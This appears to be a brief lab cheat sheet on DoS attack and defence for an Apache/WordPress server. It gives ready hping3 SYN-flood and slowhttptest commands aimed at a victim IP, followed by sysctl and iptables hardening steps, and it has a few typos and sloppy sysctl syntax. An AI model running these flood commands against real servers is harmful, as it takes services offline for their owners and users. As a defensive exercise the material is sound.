Atack DOS

Connect to SSH and monitoring

Connect to ssh..

Vital Checks

top

Check Half-Open Connection Counter (hping3)

netstat -ant | grep SYN_RECV | wc -l

Check the Connection ESTABLISHED counter (slowhttptest)

 netstat -ant | grep ESTABLISHED | wc -l

Restart Apache2

sudo service apache2 restart

hping3

sudo hping3 --flood --rand-source -S -p 80 <IP-Victim>

Prevent DOS edit syctl.con

sudo vim /etc/sysctl.conf

net.ipv4.conf.default.rp_filter=1
net.ipv4.conf.all.rp_filter=1
net.ipv4.conf.default.rp_filter=1
net.ipv4.tcp_max_syn_backlog = 256
net.ipv4.conf.all.rp_filter=1
net.ipv4.tcp_synack_retries=2
net.core.netdev_max_backlog=2500

Activate SYN Cookie

sudo sysctl net.ipv4.tcp_syncookies=1

Protection IP Spoofing

sudo sysctl net.ipv4.conf.default.rp_filter=1 
sudo sysctl net.ipv4.conf.all.rp_filter=1

Limit SYN-ACK (Default = 5)

sudo sysctl net.ipv4.tcp_synack_retries = 2

Increase the size of the queue for received packets

sudo sysctl net.core.netdev_max_backlog = 2500

Disables accepting ICMP redirect packets (Prevents MITM)

sudo sysctl net.ipv4.conf.all.accept_redirects = 0

Enable them without restarting

sudo sysctl -p

slowhttptest

slowhttptest -c 1000 -H -g -o slow_stats -i 10 -r 200 -t GET -u http://<IP-Victim>/wordpress/ -x 24 -p 3

Setting a limitation on the HTTP per IP

sudo iptables -I INPUT 1 -p tcp --dport 80 -m connlimit --connlimit-above 20 -j REJECT --reject-with tcp-reset

Check iptables contains